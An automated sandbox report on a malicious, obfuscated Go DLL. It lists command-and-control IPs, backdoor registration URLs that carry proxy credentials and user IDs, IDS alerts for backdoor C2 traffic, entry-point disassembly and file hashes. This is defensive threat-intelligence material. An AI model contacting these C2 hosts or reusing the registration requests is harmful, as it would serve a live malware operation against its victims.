http://77.238.224.56Go-http-client/1.1http://77.238.229.6377.238.250.123:80Go-http-client/1.1If-Modirundll32.exe, 00000004.00000002.3932131837.000000000D140000.00000004.00001000.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://91.142.74.28PMrundll32.exe, 00000004.00000002.3932131837.000000000D0A2000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3934227145.000000000D90C000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3932347032.000000000D88C000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3932978999.000000000D4BE000.00000004.00001000.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://195.2.70.38Prundll32.exe, 00000004.00000002.3932131837.000000000D012000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3934227145.000000000D90C000.00000004.00001000.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://77.238.229.6377.238.250.123:80rundll32.exe, 00000004.00000002.3932131837.000000000D012000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3932347032.000000000D88C000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3932978999.000000000D4BE000.00000004.00001000.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://195.2.70.38Go-http-client/1.1PMrundll32.exe, 00000007.00000002.3934146478.000000000D598000.00000004.00001000.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://91.142.74.28rundll32.exe, 00000007.00000002.3931954299.000000000D45A000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3932978999.000000000D4BE000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3934146478.000000000D598000.00000004.00001000.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://195.2.70.38rundll32.exe, 00000007.00000002.3931954299.000000000D464000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3934146478.000000000D663000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3934146478.000000000D60C000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3931954299.000000000D414000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3931954299.000000000D45A000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3932978999.000000000D4BE000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3934146478.000000000D598000.00000004.00001000.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPDomainCountryFlagASNASN NameMalicious
91.142.74.28
unknownRussian Federation
48720VTSL1-ASRUtrue
185.231.155.234
unknownRussian Federation
48282VDSINA-ASRUtrue
77.238.229.63
unknownRussian Federation
42429TELERU-ASRUtrue
195.2.70.38
unknownRussian Federation
48282VDSINA-ASRUtrue
77.238.250.123
unknownRussian Federation
42429TELERU-ASRUtrue
77.238.224.56
unknownRussian Federation
42429TELERU-ASRUtrue
Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1473486
Start date and time:2024-07-15 12:49:56 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 6m 45s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:Run with higher sleep bypass
Number of analysed new started processes analysed:12
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:file.dll
Detection:MAL
Classification:mal76.evad.winDLL@14/1@0/6
EGA Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Found application associated with file extension: .dll
  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
  • Not all processes where analyzed, report is missing behavior information
  • VT rate limit hit for: file.dll
No simulations
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
91.142.74.28file.dllGet hashmaliciousUnknownBrowse
  • 91.142.74.28/
file.dllGet hashmaliciousUnknownBrowse
  • 91.142.74.28/
PZjMIa3MvC.exeGet hashmaliciousGO BackdoorBrowse
  • 91.142.74.28:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=9b5ce04ec39c07546e6e12b6b60a6af0&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh
heic.exeGet hashmaliciousGO BackdoorBrowse
  • 91.142.74.28:30001/api/helper-first-register?buildVersion=0SfI.qXU2qCl&md5=a64beab5d4516beca4c40b25dc0c1cd8&proxyPassword=NSU8Wq2U&proxyUsername=9nDNinxL&userId=mI62iJuWkLVJyhV2
poration.exeGet hashmaliciousLummaC, GO Backdoor, LummaC StealerBrowse
  • 91.142.74.28:30001/api/helper-first-register?buildVersion=03zq.qg826lp&md5=8f590a1aa472160887481c6e2f5f38d8&proxyPassword=QcA2y2Ws&proxyUsername=Sdow5dAF&userId=nWqFhTmNaQbSt2Ihda7aed7vpyuhphsatZmVrHbTykEH19TJ2xgu3Zjq48nS
o8JAdiyezt.exeGet hashmaliciousLummaCBrowse
  • 91.142.74.28:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=7ca367a34e36125fa9a9db11d6ca360d&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh
4m8RBorBUl.exeGet hashmaliciousLummaCBrowse
  • 91.142.74.28:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=3e5aa81f88377e3ca36da63dc29a2a89&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh
q49LB2eQuo.exeGet hashmaliciousUnknownBrowse
  • 91.142.74.28:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=3e5aa81f88377e3ca36da63dc29a2a89&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh
rU53IkLA9a.exeGet hashmaliciousLummaCBrowse
  • 91.142.74.28:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=168b30717cd1d87c367fb2db2a800bd4&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh
185.231.155.234ChOQ8w8NqZ.exeGet hashmaliciousUnknownBrowse
    77.238.229.63file.dllGet hashmaliciousUnknownBrowse
    • 77.238.229.63/
    file.dllGet hashmaliciousUnknownBrowse
    • 77.238.229.63/
    PZjMIa3MvC.exeGet hashmaliciousGO BackdoorBrowse
    • 77.238.229.63:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=9b5ce04ec39c07546e6e12b6b60a6af0&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh
    o8JAdiyezt.exeGet hashmaliciousLummaCBrowse
    • 77.238.229.63:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=7ca367a34e36125fa9a9db11d6ca360d&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh
    4m8RBorBUl.exeGet hashmaliciousLummaCBrowse
    • 77.238.229.63:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=3e5aa81f88377e3ca36da63dc29a2a89&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh
    q49LB2eQuo.exeGet hashmaliciousUnknownBrowse
    • 77.238.229.63:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=3e5aa81f88377e3ca36da63dc29a2a89&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh
    rU53IkLA9a.exeGet hashmaliciousLummaCBrowse
    • 77.238.229.63:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=168b30717cd1d87c367fb2db2a800bd4&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh
    195.2.70.38file.dllGet hashmaliciousUnknownBrowse
    • 195.2.70.38/
    file.dllGet hashmaliciousUnknownBrowse
    • 195.2.70.38/
    Image is copyrighted.exeGet hashmaliciousLummaC, GO Backdoor, LummaC StealerBrowse
    • 195.2.70.38:30001/api/helper-first-register?buildVersion=0ZQk.wWJ2fdm&md5=f98035f22fcf11f0517bd800a8f92ca7&proxyPassword=R9iFXF6P&proxyUsername=Ul0u22aL&userId=i6cYnot2vd9Mo2PxiZ5jirphnl7Ccgwt20zY0iDM2ASS4lu9
    PZjMIa3MvC.exeGet hashmaliciousGO BackdoorBrowse
    • 195.2.70.38:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=9b5ce04ec39c07546e6e12b6b60a6af0&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh
    heic.exeGet hashmaliciousGO BackdoorBrowse
    • 195.2.70.38:30001/api/helper-first-register?buildVersion=0SfI.qXU2qCl&md5=a64beab5d4516beca4c40b25dc0c1cd8&proxyPassword=NSU8Wq2U&proxyUsername=9nDNinxL&userId=mI62iJuWkLVJyhV2
    poration.exeGet hashmaliciousLummaC, GO Backdoor, LummaC StealerBrowse
    • 195.2.70.38:30001/api/helper-first-register?buildVersion=03zq.qg826lp&md5=8f590a1aa472160887481c6e2f5f38d8&proxyPassword=QcA2y2Ws&proxyUsername=Sdow5dAF&userId=nWqFhTmNaQbSt2Ihda7aed7vpyuhphsatZmVrHbTykEH19TJ2xgu3Zjq48nS
    ChOQ8w8NqZ.exeGet hashmaliciousUnknownBrowse
    • 195.2.70.38:30001/api/helper-first-register?buildVersion=0D14.gjm2oNi&md5=b06e67f9767e5023892d9698703ad098&proxyPassword=lzuMLKyh&proxyUsername=5Vx2nN8C&userId=mXE0iIPukTkyydhF
    o8JAdiyezt.exeGet hashmaliciousLummaCBrowse
    • 195.2.70.38:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=7ca367a34e36125fa9a9db11d6ca360d&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh
    4m8RBorBUl.exeGet hashmaliciousLummaCBrowse
    • 195.2.70.38:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=3e5aa81f88377e3ca36da63dc29a2a89&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh
    No context
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    TELERU-ASRUfile.dllGet hashmaliciousUnknownBrowse
    • 77.238.224.56
    file.dllGet hashmaliciousUnknownBrowse
    • 77.238.224.56
    PZjMIa3MvC.exeGet hashmaliciousGO BackdoorBrowse
    • 77.238.224.56
    poration.exeGet hashmaliciousLummaC, GO Backdoor, LummaC StealerBrowse
    • 77.238.224.56
    o8JAdiyezt.exeGet hashmaliciousLummaCBrowse
    • 77.238.224.56
    4m8RBorBUl.exeGet hashmaliciousLummaCBrowse
    • 77.238.224.56
    q49LB2eQuo.exeGet hashmaliciousUnknownBrowse
    • 77.238.224.56
    rU53IkLA9a.exeGet hashmaliciousLummaCBrowse
    • 77.238.224.56
    VTSL1-ASRUfile.dllGet hashmaliciousUnknownBrowse
    • 91.142.74.28
    file.dllGet hashmaliciousUnknownBrowse
    • 91.142.74.28
    PZjMIa3MvC.exeGet hashmaliciousGO BackdoorBrowse
    • 91.142.73.198
    heic.exeGet hashmaliciousGO BackdoorBrowse
    • 91.142.74.28
    poration.exeGet hashmaliciousLummaC, GO Backdoor, LummaC StealerBrowse
    • 91.142.74.28
    o8JAdiyezt.exeGet hashmaliciousLummaCBrowse
    • 91.142.74.28
    4m8RBorBUl.exeGet hashmaliciousLummaCBrowse
    • 91.142.74.28
    q49LB2eQuo.exeGet hashmaliciousUnknownBrowse
    • 91.142.74.28
    rU53IkLA9a.exeGet hashmaliciousLummaCBrowse
    • 91.142.74.28
    VDSINA-ASRUfile.dllGet hashmaliciousUnknownBrowse
    • 62.113.116.83
    file.dllGet hashmaliciousUnknownBrowse
    • 94.103.90.9
    mlk3kK6uLZ.exeGet hashmaliciousAmadey, Mars Stealer, PureLog Stealer, Quasar, RedLine, Stealc, VidarBrowse
    • 195.2.76.207
    https://bevelia.net/app/Get hashmaliciousUnknownBrowse
    • 178.208.83.57
    https://bevelia.net/app/Get hashmaliciousUnknownBrowse
    • 178.208.83.57
    5uKDxM17pT.exeGet hashmaliciousAveMaria, UACMeBrowse
    • 109.234.38.71
    file.exeGet hashmaliciousLummaC, Python Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, SmokeLoaderBrowse
    • 195.2.71.70
    setup.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLineBrowse
    • 195.2.71.70
    FpbdV1sU4k.exeGet hashmaliciousUnknownBrowse
    • 195.2.71.70
    TELERU-ASRUfile.dllGet hashmaliciousUnknownBrowse
    • 77.238.224.56
    file.dllGet hashmaliciousUnknownBrowse
    • 77.238.224.56
    PZjMIa3MvC.exeGet hashmaliciousGO BackdoorBrowse
    • 77.238.224.56
    poration.exeGet hashmaliciousLummaC, GO Backdoor, LummaC StealerBrowse
    • 77.238.224.56
    o8JAdiyezt.exeGet hashmaliciousLummaCBrowse
    • 77.238.224.56
    4m8RBorBUl.exeGet hashmaliciousLummaCBrowse
    • 77.238.224.56
    q49LB2eQuo.exeGet hashmaliciousUnknownBrowse
    • 77.238.224.56
    rU53IkLA9a.exeGet hashmaliciousLummaCBrowse
    • 77.238.224.56
    VDSINA-ASRUfile.dllGet hashmaliciousUnknownBrowse
    • 62.113.116.83
    file.dllGet hashmaliciousUnknownBrowse
    • 94.103.90.9
    mlk3kK6uLZ.exeGet hashmaliciousAmadey, Mars Stealer, PureLog Stealer, Quasar, RedLine, Stealc, VidarBrowse
    • 195.2.76.207
    https://bevelia.net/app/Get hashmaliciousUnknownBrowse
    • 178.208.83.57
    https://bevelia.net/app/Get hashmaliciousUnknownBrowse
    • 178.208.83.57
    5uKDxM17pT.exeGet hashmaliciousAveMaria, UACMeBrowse
    • 109.234.38.71
    file.exeGet hashmaliciousLummaC, Python Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, SmokeLoaderBrowse
    • 195.2.71.70
    setup.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLineBrowse
    • 195.2.71.70
    FpbdV1sU4k.exeGet hashmaliciousUnknownBrowse
    • 195.2.71.70
    No context
    No context
    Process:C:\Windows\SysWOW64\rundll32.exe
    File Type:data
    Category:dropped
    Size (bytes):408
    Entropy (8bit):6.236332607274253
    Encrypted:false
    SSDEEP:12:EeT3LOX7Yj8+F21JyP2Paiq0Wur/F8VIN:LG7Yrw1PWur9tN
    MD5:4B37306C60F1F62E6F4A5287DD56A451
    SHA1:D3AC1383EE830AE538CDC39D6E48F3A07BC9C4EA
    SHA-256:2C6526C60CF9CAB5AFE99FC128CA0737B7F4F731D6EBA62BF74DB87CF00FFF6F
    SHA-512:F247D89D0DA710C83CF07BE1397A7BC7AADED6BB60E8D6FB8AACE1B4447AF9C865199CA2B7CFE1DB13F730F93DD75FFC9897DD893C1680DB6E6EE3F3BD965BB2
    Malicious:false
    Reputation:low
    Preview:..^0..)..W...W.-S0T.A6Y.L_.2X!" W.:WV.6WG.V5\^ZSM6$-^1%^^...M);)Z=$.V .=O(\>.TU ...3.. ..%1]T <#L943FV[.W...R8.3G#.._..QW. .[)Z+@..TT!7.]Q7.@V..Q#Y.Q*W.B..S.Z6#.*)-.>.(.7..SV. A6Y/L ..^..8Y.<.M-4T["*>].94[*YUGU.X\!=2Q;7.]))-@..5V.."_.;ZB ...=+#.PT..S.1....S. _A.8.L+.<^,..Y,(.M].![.!!]T(7[..4G(;Z\+..Q.6.P...@S.>U..1Z.._B..5..'!.......$....SU).A//"L...^^.ZY.0.M."6[T2"]2..[,=6GT..\.. V\[.Y..,@,.?R=V.[.._].*5
    File type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
    Entropy (8bit):7.902787372673727
    TrID:
    • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
    • Generic Win/DOS Executable (2004/3) 0.20%
    • DOS Executable Generic (2002/1) 0.20%
    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
    File name:file.dll
    File size:13'860'360 bytes
    MD5:e6743e380f2418b616dca113dbbc93cb
    SHA1:6c051a6d3a183c24292d6821865a5a183b4ebb9c
    SHA256:eb7183f807b13b4524393b8da4cc242d96283a13ecd7331db1fcefd43986d0c9
    SHA512:99f35577b520efd679179c3bc3996499daf895fdb17d0fd20960acd65caec9ba5ed6c7bdeaefe0229f753658fb88f11594c8160fab57ac8ebc1a77a729e6abdd
    SSDEEP:196608:DDErb7pO6pV9Mqhdq3PusYB8NggX4WR+2EZ1hggBMY+gj7LWWtYH4c3nUOTBDAaX:DmUSDBYSBIoM5Shgg+dW64cXUoBDAaX
    TLSH:52D633D22FC741EAD5D209B4E31767D707F3945A8EC688343A8D3542B061FB3A1AEC66
    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...(..N..v...b...Y........N...,l.........................P....../.....@... .....................T.y.a..
    Icon Hash:7ae282899bbab082
    Entrypoint:0x6d4859d0
    Entrypoint Section:.rdata2
    Digitally signed:true
    Imagebase:0x6c2c0000
    Subsystem:windows gui
    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED, DLL
    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
    TLS Callbacks:0x6da62f8c, 0x6c7abd60, 0x6c7abd10
    CLR (.Net) Version:
    OS Version Major:6
    OS Version Minor:1
    File Version Major:6
    File Version Minor:1
    Subsystem Version Major:6
    Subsystem Version Minor:1
    Import Hash:6c871eb5afcc648e749d578ab8277277
    Signature Valid:false
    Signature Issuer:CN=VeriSign Class 3 Code Signing 2010 CA, OU=Terms of use at https://www.verisign.com/rpa (c)10, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
    Signature Validation Error:The digital signature of the object did not verify
    Error Number:-2146869232
    Not Before, Not After
    • 22/12/2013 19:00:00 22/12/2016 18:59:59
    Subject Chain
    • CN=Oracle Corporation, OU=VirtualBox, OU=Digital ID Class 3 - Microsoft Software Validation v2, O=Oracle Corporation, L=Redwood Shores, S=California, C=US
    Version:3
    Thumbprint MD5:50BFA74751D185A89CCB20B4301B4AAE
    Thumbprint SHA-1:7E92B66BE51B79D8CE3FF25C15C2DF6AB8C7F2F2
    Thumbprint SHA-256:59B96B88E47C42FB42BBA1C6FC05BBDF24CA16A91507D633BAFBB39757F7339E
    Serial:51CA009816FDBD80F120E015EE75823E
    Instruction
    push ebp
    pushfd
    mov ebp, 6B9318BCh
    shr ebp, 42h
    bswap ebp
    mov ebp, dword ptr [esp+ebp*2-5F8DC830h]
    mov dword ptr [esp+04h], 168EA86Dh
    push dword ptr [esp+00h]
    popfd
    lea esp, dword ptr [esp+04h]
    call 00007F4751F1E2B2h
    inc eax
    mov eax, edx
    neg byte ptr [esp+02h]
    ror word ptr [esp+15h], 0049h
    shl dword ptr [esp+00h], 1Ah
    mov ecx, dword ptr [eax]
    mov edx, dword ptr [esp+18h]
    lea eax, dword ptr [0D912A20h+edx*4]
    mov dword ptr [esp+edx-6CF39CF1h], eax
    mov eax, dword ptr [edi+edx-6CF39CDBh]
    adc ecx, eax
    movsx eax, word ptr [esp+edx-6CF39CDDh]
    sub edx, eax
    call 00007F4751E0E763h
    dec eax
    mov dword ptr [esp+edx-000054CDh], 00931ABFh
    inc ecx
    rol dl, 1
    dec eax
    xchg dword ptr [esp+08h], ebp
    dec eax
    add ebp, 0029843Ah
    jmp ebp
    dec ecx
    xor ebp, ebx
    dec esi
    mov dword ptr [esp+ebx-5197AFB5h], esi
    dec eax
    adc esi, ecx
    dec esp
    lea edx, dword ptr [9A32CE25h+edi*2]
    push ebp
    inc ebx
    mov ebx, dword ptr [edi+esi*2+095DD396h]
    mul eax
    dec eax
    mov dword ptr [esp+ebp-51971F98h], 001EED02h
    inc ebx
    movzx edi, byte ptr [ebx+eax-5197AFBAh]
    inc ecx
    xor bh, ch
    shr dl, 00000026h
    je 00007F475140FB98h
    mov dword ptr [eax+eax+00h], edx
    NameVirtual AddressVirtual Size Is in Section
    IMAGE_DIRECTORY_ENTRY_EXPORT0x179a2540x61.rdata2
    IMAGE_DIRECTORY_ENTRY_IMPORT0xea93040x3c.rdata2
    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
    IMAGE_DIRECTORY_ENTRY_SECURITY0xd336000x4808.rdata0
    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1bc40000x43c.reloc
    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
    IMAGE_DIRECTORY_ENTRY_TLS0x19145b40x18.rdata2
    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_IAT0xe900000x10.rdata1
    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
    .text0x10000x4ec4a80x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    .data0x4ee0000x2cf6c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    .rdata0x51b0000x2ae2d40x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
    .bss0x7ca0000x360900x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    .edata0x8010000x610x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
    .idata0x8020000x9c00x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    .CRT0x8030000x2c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    .tls0x8040000x80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    .rdata00x8050000x68a3320x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    .rdata10xe900000x2c0x2000a91ad87cd345cc059e0ce3bc5667d43False0.04296875data0.14263576814887827IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    .rdata20xe910000xd329700xd32a0074a53f560fcb613b34d713b8430dde26unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    .reloc0x1bc40000x43c0x600a8b5e214483e05d9e45a726c056304e5False0.4016927083333333data3.4674879728835952IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
    DLLImport
    KERNEL32.dllAddVectoredExceptionHandler
    msvcrt.dll__mb_cur_max
    NameOrdinalAddress
    MainFunc10x6c7a6460
    _cgo_dummy_export20x6cabf64c

    Download Network PCAP: filteredfull

    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
    07/15/24-12:52:56.229033TCP2855536ETPRO TROJAN Unknown Golang Backdoor CnC Client Request M14977020529192.168.2.5185.231.155.234
    07/15/24-12:53:25.827998TCP2855538ETPRO TROJAN Unknown Golang Backdoor CnC Server Response M12052949770185.231.155.234192.168.2.5
    07/15/24-12:52:56.228835TCP2855539ETPRO TROJAN Unknown Golang Backdoor CnC Server Response M22052949770185.231.155.234192.168.2.5
    07/15/24-12:53:25.610445TCP2855537ETPRO TROJAN Unknown Golang Backdoor CnC Client Request M24977020529192.168.2.5185.231.155.234
    • Total Packets: 365
    • 20529 undefined
    • 80 (HTTP)
    TimestampSource PortDest PortSource IPDest IP
    Jul 15, 2024 12:50:54.643198013 CEST4970780192.168.2.5195.2.70.38
    Jul 15, 2024 12:50:54.648312092 CEST8049707195.2.70.38192.168.2.5
    Jul 15, 2024 12:50:54.648411989 CEST4970780192.168.2.5195.2.70.38
    Jul 15, 2024 12:50:54.649132967 CEST4970780192.168.2.5195.2.70.38
    Jul 15, 2024 12:50:54.653975010 CEST8049707195.2.70.38192.168.2.5
    Jul 15, 2024 12:50:54.918894053 CEST4970880192.168.2.5195.2.70.38
    Jul 15, 2024 12:50:55.803812981 CEST8049708195.2.70.38192.168.2.5
    Jul 15, 2024 12:50:55.803927898 CEST4970880192.168.2.5195.2.70.38
    Jul 15, 2024 12:50:55.833787918 CEST4970880192.168.2.5195.2.70.38
    Jul 15, 2024 12:50:55.839628935 CEST8049708195.2.70.38192.168.2.5
    Jul 15, 2024 12:50:56.400330067 CEST8049707195.2.70.38192.168.2.5
    Jul 15, 2024 12:50:56.400409937 CEST4970780192.168.2.5195.2.70.38
    Jul 15, 2024 12:50:56.405544996 CEST4970780192.168.2.5195.2.70.38
    Jul 15, 2024 12:50:56.406368017 CEST4970980192.168.2.591.142.74.28
    Jul 15, 2024 12:50:56.410697937 CEST8049707195.2.70.38192.168.2.5
    Jul 15, 2024 12:50:56.411561012 CEST804970991.142.74.28192.168.2.5
    Jul 15, 2024 12:50:56.411792040 CEST4970980192.168.2.591.142.74.28
    Jul 15, 2024 12:50:56.412877083 CEST4970980192.168.2.591.142.74.28
    Jul 15, 2024 12:50:56.419964075 CEST804970991.142.74.28192.168.2.5
    Jul 15, 2024 12:50:57.536612988 CEST8049708195.2.70.38192.168.2.5
    Jul 15, 2024 12:50:57.536683083 CEST4970880192.168.2.5195.2.70.38
    Jul 15, 2024 12:50:57.536834955 CEST4970880192.168.2.5195.2.70.38
    Jul 15, 2024 12:50:57.538947105 CEST4971080192.168.2.591.142.74.28
    Jul 15, 2024 12:50:57.541824102 CEST8049708195.2.70.38192.168.2.5
    Jul 15, 2024 12:50:57.543942928 CEST804971091.142.74.28192.168.2.5
    Jul 15, 2024 12:50:57.544014931 CEST4971080192.168.2.591.142.74.28
    Jul 15, 2024 12:50:57.545780897 CEST4971080192.168.2.591.142.74.28
    Jul 15, 2024 12:50:57.550724983 CEST804971091.142.74.28192.168.2.5
    Jul 15, 2024 12:50:58.148911953 CEST804970991.142.74.28192.168.2.5
    Jul 15, 2024 12:50:58.149007082 CEST4970980192.168.2.591.142.74.28
    Jul 15, 2024 12:50:58.149137974 CEST4970980192.168.2.591.142.74.28
    Jul 15, 2024 12:50:58.152705908 CEST4971180192.168.2.577.238.224.56
    Jul 15, 2024 12:50:58.157793045 CEST804970991.142.74.28192.168.2.5
    Jul 15, 2024 12:50:58.159037113 CEST804971177.238.224.56192.168.2.5
